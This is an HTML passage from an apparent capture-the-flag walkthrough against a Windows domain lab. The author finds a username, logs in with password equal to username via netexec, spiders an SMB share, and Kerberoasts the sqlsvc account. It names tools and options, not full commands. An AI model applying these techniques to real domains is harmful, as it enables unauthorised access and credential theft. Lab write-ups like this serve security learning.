url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRElEQVR42p2Sy0sDMRDG8//fxPqkCIqPSosnW6VaxSpCvXgQQVhEu3iQKrrt7ibZzeMzmd22aC+2A9/OzpD5ZZIJ6203oWAguICU8peEEOCcI01TivM8R5ZlM+u4qwUsNpfaYPe7p/BmjcXU7FwyRlNVdbkD9rBfAOOYI05cN1xiXjNlMwR8PCiAMgoghwHy+BlWhE79GRn+6uQ8xeEkp9N+AaxcgD0RUCP/vEH20S39NcTgCtJ56XIkiruTHK39uoWOelDfd8SoVi7BgtpJeYfKfTR5a9XUj//Nn1yZ9zVG58TY8kd+OWxR4KentcYiNr7DnZVzsLDeolkNo8iNP3U724WBe6tnYG/1JgVpkrhJxxiNRlBKUbfGmLmAtTUHfG8UwKSEefkH7a/Ag/8HLDaurzvgoHFcDsXQcRc7cgE82mjjB087TOI6cCsNAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="IT Services page" title="" src="/static/74c97e4dded3b58997a3da4cd4b1f79c/50637/IT-services-page.png" srcset="/static/74c97e4dded3b58997a3da4cd4b1f79c/dda05/IT-services-page.png 158w, /static/74c97e4dded3b58997a3da4cd4b1f79c/679a3/IT-services-page.png 315w, /static/74c97e4dded3b58997a3da4cd4b1f79c/50637/IT-services-page.png 630w, /static/74c97e4dded3b58997a3da4cd4b1f79c/fddb0/IT-services-page.png 945w, /static/74c97e4dded3b58997a3da4cd4b1f79c/ca644/IT-services-page.png 1038w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>"Contacting IT support" redirected to <code class="language-text">/supportrequest.html</code> and contained some information about submitting a support request. More interestingly though, there was a screenshot that had a potential username, <code class="language-text">ksimpson</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f0d6cd2f3026be759f0e97790a517855/ca644/contacting-IT-support-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 96.83544303797468%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAACR0lEQVR42q2UbYsSURTHB0EdRU17s6mwvfVD+FIEP0O19LLo00TP+1TU1uK6a2iujrvW4voQLERhlEH0IqIgeiWuOjoP/+69M3dmNKOSLvy599y55zfn3HNmhNb9MjTokEcyxuPxlGRZxmg0wnA4ZLaiKJhMJr+cGxFfOlavH0A4eVhlhq7pWHRopu/6jecQXm0ZwF6vh36/zzQYDBYHvt6SmKGQVGhKXLquW/onYOcxByr/J+V32wZwcHpqRUeLMXFErGnaXwE3KLC7XTE2VZU50hTp7Fz/KW0OfHCzBuFjtmJGOGDOKgHz9uDRcdFnVL8DPrpFgJ+yZWaMzTRpurTKtPdoD9K9WTkLRqWqxpU8uX0I4fOODZRNjWW7sZk908hUPAPW6OQ8Hdk7BPglt2/doaoqbJ7XLk7biMpOn6ecu0uAX3MlZrx5+x77hy9QPTpGoXKAolTD05KEPNFusYw9ovyzCnKFEhovT6y7NgpnAPP3yKf3bafIjIsrlyEIAsLhCNxuD5EbHo8Xoigyeb0ifD4fO5NMJqei5W1VWCXA7ybwytVrOBuJIJFIYPn8MpbOLSEajSIejyMeiyFKFIvHGDSTycwFltYcwAuXVtjbQ6EQ/H4/c6QSfaK1DgQC7EwqlZoLrKxVbSBP+Uw4zBwtBYMImmv6MpfLhXQ6PRdYXSfAH7tGUbrdD6jX62i322i1Wmg0Gta62Wyymdp0v9PpTFfdBNY2JALcKy30P5wHPNqU7Ag1s6+cn5hTzv3ZnwUHHm9K+AliSS7/5iZSHwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="contacting IT support page" title="" src="/static/f0d6cd2f3026be759f0e97790a517855/50637/contacting-IT-support-page.png" srcset="/static/f0d6cd2f3026be759f0e97790a517855/dda05/contacting-IT-support-page.png 158w, /static/f0d6cd2f3026be759f0e97790a517855/679a3/contacting-IT-support-page.png 315w, /static/f0d6cd2f3026be759f0e97790a517855/50637/contacting-IT-support-page.png 630w, /static/f0d6cd2f3026be759f0e97790a517855/fddb0/contacting-IT-support-page.png 945w, /static/f0d6cd2f3026be759f0e97790a517855/ca644/contacting-IT-support-page.png 1038w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The "New user account form" link on the IT Services page brought up a form that didn't seem to submit any data, so I moved on to "Report a problem with the sales orders app" which redirected to <code class="language-text">/salesorders.html</code>. This was a page about troubleshooting the app and mentioned a debug logging option. This looked to be what was running on port <code class="language-text">4411</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cde1915aa2f0c56d946d3f37501dcb2f/ca644/sales-orders-app-troubleshooting-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 119.62025316455697%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAYCAYAAAD6S912AAAACXBIWXMAAAsTAAALEwEAmpwYAAACjklEQVR42q2VjW/SQBjG+f//AxOnTplbFnSbaGL2AU6NUTedGpg6BkU+S6EU2tLSlvL4vtcPOjJCF73kzXFH+7vn3ue9a+Zd9hg+5rAtG9Pp9EZYliXCNE3Ytg3HcUTc9hyIsXmviMzHnSK4zf05VrX5fPV/3PyZL/rs/bfInO0GQGsyESuxEo7ot+/7WNduAL/EwAXsn4AXIdChXLiuKyLKled58VxyPjnHwc/FwB+5ALhI8iL5s9lM5I9VRn00l4xZUmEpV4gVitWFKg9Tx6UtT+PV02x5i4GXzwLgWNfRlWW0O12oqkqlQiYR0F/jcBK4s0HAX89PxMAwTPQVBVKtBkmSYuhdTNndOEXmKgTqpJBdrVSuUSqVMaHfum4QML3C3AMCVvcCICuSacvNZhPNegOjs3OMBwOs17cA7j0koLQfAHtyD+XyJXqDIQbDMYZdBZo2SpfDMC0Hj94g09g/FoM+qanX61DUERRtDE03MRyN0205BOYZ2DoIgf0+5F4PlZqEq6qETqcNhebuovDVJgE7L44CU8Y6BpTHoaaJ6Cl90XMdep4bnxAec3HfBnz9mG4bOQSaVDZ8UqLTEPX21BGFzuMolm+fCHj4hIBKPgB22h3UqAZN0yB4GHQPGtTbtFCaLZ8wUM0fikGXTsjP3xU0WjI0w4JmWsIYlYyx6PJNAyxmGfgyAMpUNtVqFRLVYffrBQbfvpPb5DidHmNipQKebhUYeBQW9pCMUESo5Ha93kT1TwvXtIhO+U0DfJ8ETihfE1LCOdNCp3kuuhcjd5d7DpduJm4fnhYWW3bsxQeHocIMO/hwcblELy8Hq/Pc4Ir7tJ1QOPfTnNoVH7Hw3c8CGLr8P4Dn2yf4C2BPNeWHVMUOAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sales orders app troubleshooting page" title="" src="/static/cde1915aa2f0c56d946d3f37501dcb2f/50637/sales-orders-app-troubleshooting-page.png" srcset="/static/cde1915aa2f0c56d946d3f37501dcb2f/dda05/sales-orders-app-troubleshooting-page.png 158w, /static/cde1915aa2f0c56d946d3f37501dcb2f/679a3/sales-orders-app-troubleshooting-page.png 315w, /static/cde1915aa2f0c56d946d3f37501dcb2f/50637/sales-orders-app-troubleshooting-page.png 630w, /static/cde1915aa2f0c56d946d3f37501dcb2f/fddb0/sales-orders-app-troubleshooting-page.png 945w, /static/cde1915aa2f0c56d946d3f37501dcb2f/ca644/sales-orders-app-troubleshooting-page.png 1038w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>"Request a password reset" redirected to <code class="language-text">/passwords.html</code>. This page revealed that some users might have their password set to be the same as the username:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3af40fb4f824518e020c070d1c06d147/ca644/password-resets-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 37.34177215189873%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAArElEQVR42qWRMQvCMBCF8/83UXRQBwcRkW7tVP0rTg6CLrVNc0mbPL1rgyJ0aQ8+8o6Qx92Luh5StADIEKy1gnNOYE1EMMaIbppGiPcRIguu9SyHup0yaYIPGFu+f7uZX6DuSQZuX0UhlGU5zfCZdBOauu7o1+NVmV89hPnExbWNhuyvqwpaazGM+cU8/7MdynC3OEM9krQbu/UIIQhjV94v86/htE/xch5XOd7j2x1pdv4YYwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="password resets page" title="" src="/static/3af40fb4f824518e020c070d1c06d147/50637/password-resets-page.png" srcset="/static/3af40fb4f824518e020c070d1c06d147/dda05/password-resets-page.png 158w, /static/3af40fb4f824518e020c070d1c06d147/679a3/password-resets-page.png 315w, /static/3af40fb4f824518e020c070d1c06d147/50637/password-resets-page.png 630w, /static/3af40fb4f824518e020c070d1c06d147/fddb0/password-resets-page.png 945w, /static/3af40fb4f824518e020c070d1c06d147/ca644/password-resets-page.png 1038w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With one potential username, I tried authenticating with <code class="language-text">netexec</code> using <code class="language-text">ksimpson</code> for the username and password (making sure to use the <code class="language-text">-k</code> option for Kerberos authentication and not NTLM). The credentials authenticated:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6fd72d91f37bb3c83d850b7462b6f8f3/70582/netexec-smb-kerberos-auth.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 14.556962025316455%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAvUlEQVR42j2OW27CMBREWUtVECSOCXEeYMdNbdlVUkEItFI/uv91nLqo6sdI92POubPayIG1mlMWsoNH23ecX/DxjhnOuHDj1E+sdx353rIrejaZJpN/d2543h7/s5L9F0IFDu3I4K5YN2PHT3S8UelI5z/Q4zdqWOjMSN5MFHXkaKb0/EzZBvbKU9YBUb4mYXdFiBOytDRdpEoFaROk38jVwDbBQl8o+zktfOGpMIg6CSr3EFVNeDCq/WUjP00kZBQ6HdqMAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec smb kerberos auth" title="" src="/static/6fd72d91f37bb3c83d850b7462b6f8f3/50637/netexec-smb-kerberos-auth.png" srcset="/static/6fd72d91f37bb3c83d850b7462b6f8f3/dda05/netexec-smb-kerberos-auth.png 158w, /static/6fd72d91f37bb3c83d850b7462b6f8f3/679a3/netexec-smb-kerberos-auth.png 315w, /static/6fd72d91f37bb3c83d850b7462b6f8f3/50637/netexec-smb-kerberos-auth.png 630w, /static/6fd72d91f37bb3c83d850b7462b6f8f3/70582/netexec-smb-kerberos-auth.png 689w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">ksimpson</code> had read access to the <code class="language-text">Public</code> share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/422522dd5a68f4c24d8930ba66812a87/d2eea/netexec-list-shares-ksimpson.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.65822784810127%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACfUlEQVR42l2T13bbMBBE+SdJFEukWNEIkGBRoZot23E5ecsX5P/fJwM6dsrDHpA4wN2Z3UW0NA+4qV+Q2nvU/ozD6RWH4yv2jM3hCee77yjUiKToUKot4rxDUg7IxRZpNWLJ/1U1YFn2uFm3iHJ7i8Ls4TcP8OMV3ekF7vgMNd6hai9wlx+Qu1fU4yOkPSPWF8h6guuuFHCLyh4g2hNEc5qTRoU+IC87NP0tD13QTN8gCZNUm6odv59gNs+oh0esc49SDjDNGTWTBaDrrzAh8XCFdkdEqToir3oMuwcoZjOO2WitlBskWYvaTjDz/hFpMaCqdoSdCL3MYOtPtN5jTctJ0SPSqscyqQmbmOHAA2cIlqDSW6xpYVbDMO0ZGWvXGo+CgDgfuHbYNh6dqVEUFp9jh0hJj0VcI6eioErqPQoxsugD4swTvGOEBNOs2JQaydpisXK4SRzS1BLmeLbBYt0EhR6NUNA6ALdQLHhBcE5oTEBQK83EdUJWtNjWBiXVLOIAbPCVsQjr+i2izjTolIJ3hLwDxX/A+g1YlC2qvP4Ne4/mAxwiUqKDzDWsm+amOM+xIETQaqhhaIBtz3MnhfAYtOZFN0OzzMIK+wENERnZQWSKgGlWZ8NMhZqpAPRsypFNOc3NKSqPWrLerNkXXl5lDmVp/1EbWTbFlApTt8HG7+axCbC3sfHQYWQYkvualu+lwEFolEuDJtW4k5JT4mbVARqtyw3SRKPvTuj7Cwa+mFkRRyjlXIXX02+uaLjfihY/fYZ9KqG+qnl9FRVWif0DdNLNozBaj77uZmVh3lLWb8WuhQYVcuQ7puK8gablNHf4FNNySsvV35YdfgExdKYvKWwDFwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec list shares ksimpson" title="" src="/static/422522dd5a68f4c24d8930ba66812a87/50637/netexec-list-shares-ksimpson.png" srcset="/static/422522dd5a68f4c24d8930ba66812a87/dda05/netexec-list-shares-ksimpson.png 158w, /static/422522dd5a68f4c24d8930ba66812a87/679a3/netexec-list-shares-ksimpson.png 315w, /static/422522dd5a68f4c24d8930ba66812a87/50637/netexec-list-shares-ksimpson.png 630w, /static/422522dd5a68f4c24d8930ba66812a87/d2eea/netexec-list-shares-ksimpson.png 688w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used the <code class="language-text">spider_plus</code> module to look at what was in the share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ce5ab20bad35d2b6e08d1d7a10a2dd29/d2eea/netexec-spider_plus.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 122.78481012658229%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAZCAYAAAAxFw7TAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEsElEQVR42mVV23LbNhTkh3Q8tmRdaN5JEOBdJCVRluRYTprGcaaZPvn/P2G7B3I6nfYBAwggFnv27DlyVvkei+oPLKtviMojut0F0/kbpqdXNFzvud7sX7AICsRmizAfsIxqziMC1dv1Mm7sWaAGOGH1GW5YwE8aqHKPWPOg3MErtlhxb5mN8KszwvqEkBcW0YB10lvgpOB3WW+BErODz7Xjj3/BMxNf2KEZn1FzmNPvUNMLonpC0F6QTm/Ip1fLYpYMiJsj8voAzdm0HN0J5eZsZ2c1vMHdviEuDxZws3tB0z+h5OEqqOExnNSMyMgmyDrMohFh+WiBFEGFSFY9foRMhjeHd/w2vcNVO1T9Gd32gmp4guYFCUEuCOuWD6lyi7voiNCcME4XfvtMZicyvQLeuVpCfsWq+0rRG0Rpj4h6hKJLusE6qPAQUXAmQLT14hazYISbbsl6i0STbdrxmwoB9fbiCs6s+Yqb8gtW0QapJv1ib+dYjRbMTzZ2T1ESuXznD/DSETmTllGKhGHGHF5YYekqOOvdTyzHH0x/x1d3yKmHKie79qLWss0rJqB+RJRtMPd6pMURJSWRvZyOUMVoR0C9naj+ili0Yli6PvLSNWSfbGzIYWPZJjz3yHa9NIg5x/mVmU+Z1mHL0VEm8WHzCtc38OOOr1LgSl4lQ723ewJuGmF0RpRTN2pVmg3DHyhHj64e0JgKSZTjbm3glAQIfIXZumBS+DKNLCwDfry2tmnJRhIgSdkg8BQ8T+OOTGcrw7s5VKwRRQZzl4CxOVvAKCo+QtvaWRi4zLxHbWUvY6IeYrJNFHqd494tMCeJ+4fiura/Cdg1E9osw2A0EopuNZRwyGbt11cNM8nmaMGjIMeKTO7XV8DbVYHZL0AOJ6m+ICLDLClQMGM57aEMrUNWNssUXUtlMGEB/dekCr7PkAkkoEmosfbMP6BOXl+QRQphWLL46UMppY+whV3AjKpiIuiB6wE6pjyBxvwXYPQfQEXANFTQicG2HVCR5VXH4X+AfnoFHDUJfICWqcaDAK4/AMPqOx7cjEkp0bUH1NJBxNwEEdvE1LSiZerNEyPYY1AZJpPhdqHJUFP/HD6zfsus26So+gVJQIaxwdhcGcZqa4Fc2kZAFdub+FM0LAnQa42FW2LllaiUoVwsO6+2e07UXdj7fiBnsfebo2VYNWfW6oHm3lpNxfAZje5Rglu/g68/EkcrubZCenuekIgTjm/w++9sAAe0/SeG9gkNRz++2NAFTPbb/tnqmJRMYnmygJI4Ybl8KGmxyjrE8dm6sulP2oIXuzPK5oSuv3A+siQZMq0jHhS2IStpEdKTbA5i9PRf45c8zs3uHTf7d/43bC3gZni2DAs+ENDcKcPouNfvPkOza9+GlIQ9tBPWw4Xd/RlV92QLQpg69/0P3LBBSLfIycJI75NXCeSxi4QElVBNdWQl9ZiFDLU4c2+ivnsUjCi2VdReGS7Gn1dAlpVmAgrpfQQVc0u4EZuEaCmMLWBAQHPkb+mRB1umdwuaPRtt6I6vHzGPt+y2BTwK60uHkT7o0xYs/BXD8KRJSM9jAuYu54BtP7zWuSRjvsrtLL//Bsu7OCevavOFAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec spider_plus" title="" src="/static/ce5ab20bad35d2b6e08d1d7a10a2dd29/50637/netexec-spider_plus.png" srcset="/static/ce5ab20bad35d2b6e08d1d7a10a2dd29/dda05/netexec-spider_plus.png 158w, /static/ce5ab20bad35d2b6e08d1d7a10a2dd29/679a3/netexec-spider_plus.png 315w, /static/ce5ab20bad35d2b6e08d1d7a10a2dd29/50637/netexec-spider_plus.png 630w, /static/ce5ab20bad35d2b6e08d1d7a10a2dd29/d2eea/netexec-spider_plus.png 688w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There was a PDF document which seemed interesting:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 366px; " > <a class="gatsby-resp-image-link" href="/static/b8f115eaa80fc31622bd16a847cc465f/6cd33/json-public-share.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 35.44303797468354%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABVUlEQVR42l2R23KCMBCGfZaSkEBAp2CAAEGsVeyM7UXHGS960Fp7eP8X+LsE7XR68U3YJftlsxkxVYJXB/DZNzy9xaTYIMk7XEkDpmrCgoWEmoFFLVhQwVNzihuI0ICHBTyRUT53jJiYup+82oPXn8QJLNtRfAQvDxDmCaLYQjR7+M0HxTta3yH0PdJiibFe0EEkVsVZKMnuJ5S04OYV3JLUPDsxNy+IkltE1QJxeweZzhDVHZRZIMznUPUaynYuFyUtPHINQqnB4jl19QbefLnOmP0GKwahym8Q2TUkFalyRXQINAnNcpBdhOIiFOlZeISwJ9r8AFk9IjAbhGlLHS6diNO8/YmFGNfw48oxfJeQdG0m6cqe0LimOciIhk1D5/EMfjClYWvaWIDTxr6gHz7z+8Oz4REcGp5P9Gsf98IJdaDNyiXdA/XIv4X6zFAwkP0j/+UH4aDf0kQStHoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="json public share" title="" src="/static/b8f115eaa80fc31622bd16a847cc465f/6cd33/json-public-share.png" srcset="/static/b8f115eaa80fc31622bd16a847cc465f/dda05/json-public-share.png 158w, /static/b8f115eaa80fc31622bd16a847cc465f/679a3/json-public-share.png 315w, /static/b8f115eaa80fc31622bd16a847cc465f/6cd33/json-public-share.png 366w" sizes="(max-width: 366px) 100vw, 366px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I downloaded <code class="language-text">Network Security Changes.pdf</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0b4e2c0eccdfb52056c470a269e3a8c4/cb163/download-network-security-changes-pdf.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.949367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABIUlEQVR42h2R6W7CMBCE8yxIVdVA7sRxYucgd1KgQCuqvv+DfF34sVpbnpmdHTv7sOKgL+z1nTifsPXKPN2Z52/q7sq8PuimG/vAkuqJWPUc4lb6gJ8ceQ8q3MDgRhVvboGTFidU1pAllsaOWDNQtQtKzrEeUfUX5fBAdze0XQnzTd5OlNVGWs74MkDrDlX0fHgWxzN/7MMWTyY9QU9S0l+IjmcBd7hqw69/iJo7ftSw8xsC2SRVI6n0vFjE+YwqhZePOL75JUg6PN+gxFHdnmmljFmFNEj1HI8Xuv5Klg/svIZIBLKn+3J5xZDJ/RVHNuAESpSFGEkuhVmw1adMnV5CSroqZrTZKOxGIoS4FAEzEwjeC2tZ00i+kqMvfxE2/AP1CKk1de8hWwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="download network security changes pdf" title="" src="/static/0b4e2c0eccdfb52056c470a269e3a8c4/50637/download-network-security-changes-pdf.png" srcset="/static/0b4e2c0eccdfb52056c470a269e3a8c4/dda05/download-network-security-changes-pdf.png 158w, /static/0b4e2c0eccdfb52056c470a269e3a8c4/679a3/download-network-security-changes-pdf.png 315w, /static/0b4e2c0eccdfb52056c470a269e3a8c4/50637/download-network-security-changes-pdf.png 630w, /static/0b4e2c0eccdfb52056c470a269e3a8c4/cb163/download-network-security-changes-pdf.png 687w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The document mentioned the reason why NTLM was disabled (NTLM relay attack) and due to the attacker obtaining access to an SQL database, only network administrators were now given access to the SQL service:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/219333853dcbcd7daf8ddf16684b2c38/44507/network-security-changes-pdf.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 108.22784810126582%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAYAAADAQbwGAAAACXBIWXMAAAsTAAALEwEAmpwYAAAByElEQVR42q2UB47CQAxFuf/pEISSUBR67x0C3n2WPAzZIMRCJOOS4Y+/S3Ly+6zXaxmPx7JcLuXTJ8fP9XqVJElUfwUw/dxuNzmfz3I6neRyuTgbwUaeXZ5LA/Fst1uJokhqtZq0Wi1pNBpSr9fVRlerVS2T/58HQG48Ho9yOByUun+QTMxGpwEyM+z1enprqVTS5jwDeiUOkPTpMGCbzebzphhlX6CPZNlZ2kqlgO12W4IgUCmXy1KpVCSfzzu/UCi495TF4tjoYrEog8HgDjidTmU+nyt1ZLfbOZtSoCnFarVymknwfUbKAb7q3Ns1hDKpd7tdieNYfTQzxwSQ/WQy0aYhs9lM/eFwKKPRyGXnAKHFC4Q/QxlK0KFhb2fIH6kjtwP2MWVWik6xblBFh2HoVs6EVfR9znAW+n/GhtGgjs1mU0eAGEIN+/2+aouZj3Q6HdV8RBwgDoX1B9Rfp6wVS0/Hw+qRMh2me9Yc6mk2GdNRYmRnvnUZ3z7OCsgLqAIKJWgYLQ4bCJozaBPOENvv93dARsRmi5tsE/4z8C5DusttjI8NLTO5WCw0xoW2osQQYvjohy5TG8D8mmDbZ9/EvkRZcWvKD8vfn6lb4zzBAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="network security changes pdf" title="" src="/static/219333853dcbcd7daf8ddf16684b2c38/50637/network-security-changes-pdf.png" srcset="/static/219333853dcbcd7daf8ddf16684b2c38/dda05/network-security-changes-pdf.png 158w, /static/219333853dcbcd7daf8ddf16684b2c38/679a3/network-security-changes-pdf.png 315w, /static/219333853dcbcd7daf8ddf16684b2c38/50637/network-security-changes-pdf.png 630w, /static/219333853dcbcd7daf8ddf16684b2c38/44507/network-security-changes-pdf.png 750w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Running <code class="language-text">netexec</code> with the <code class="language-text">--kerberoasting</code> option resulted in a TGS ticket for <code class="language-text">sqlsvc</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8278b77286f919e53bbf6fd04452b56c/cb163/netexec-kerberoasting.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.64556962025317%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACzklEQVR42j2S6X7aMBDEeRmaNGljSzZgfB/cxOEwVyCQpO37v8J0VnLyYX4rC/Tf2aPT1SN0B2v8GGzhDheI8iWqSYPJfI84r1GMN0YPboInv4DTG+H+KcK9E+JBJ7jj+ZfHe79C9zFEx01f4YQrKP45r9YE1hjMGvQplczwlG3hzW/wxid4wRhdVeLRq6AGE/jREjpcQEdz/PZHhCfo3MUf+NHb4udDD2G6NK7C4gVBVsOlGx1MEJUrJNUGuk93ukDKKrJ4gjiemnOYTBFFJRwVofPYIyCo0HM9pGGOIi6QhXw0zBH1YyRBjCIpMckq3qWYBT72qcYm9lBHHqZDH03mYRz2yfDRiQYZiiDENNBYxAGWyRCrTBSgjnuokz6aQr5DvKQD7Ag7FxoHQvbUjjrkPFOz0ENnOXRxKx28lS5ecxfHzMU5t+cTz4dUEdDeFwrHXBuHu5SgTH8DT0xSx3S4JPWjcnHho2tpAcdM4b20gFNuHb2VGrdKMSpcSgt+JehIXSuN64jAhMDnUOOdwCuBp5TOCLu2cOuaAIJvpY2S5HNkdSklmYczo0BXApwPmb1w+MA1MiW2JQtQ3ApUAOJQHAv82iYQ59dWdURgHSr8Gzks0TFlfjm8mZKt3gn6GFnIMdOmbNFrrs2QTDuotfRwweleMgdnap8obGO6IPSc2XjMrU65aqcrFVnYnudNok0SacUL16gzD/ijTDOxU20IlbL3qY0HQpvUln3iw6adrpS+y8SV/v5eyNo8tw6b2KVDC9xR4vatsD0USYI9oyz0vnUkzsTVyUxc4VmAi0CZ/h1S6/BoonUnffxyKgBZl0NmyxVXx7aHApa7pV1sNpzAvxUnzWkLUL5vhV2lC6f9ybWSXZUEFzMkK0kig5Lp/xm7Jkln0rc93EYuS7XamLPCOtLYJlKmLblhv7axuFLmXlogPRwPPOQ9H4Hq4T8pwzJ3kySbCAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec kerberoasting" title="" src="/static/8278b77286f919e53bbf6fd04452b56c/50637/netexec-kerberoasting.png" srcset="/static/8278b77286f919e53bbf6fd04452b56c/dda05/netexec-kerberoasting.png 158w, /static/8278b77286f919e53bbf6fd04452b56c/679a3/netexec-kerberoasting.png 315w, /static/8278b77286f919e53bbf6fd04452b56c/50637/netexec-kerberoasting.png 630w, /static/8278b77286f919e53bbf6fd04452b56c/cb163/netexec-kerberoasting.png 687w" sizes="(max-width: 630px) 100vw, 630px" 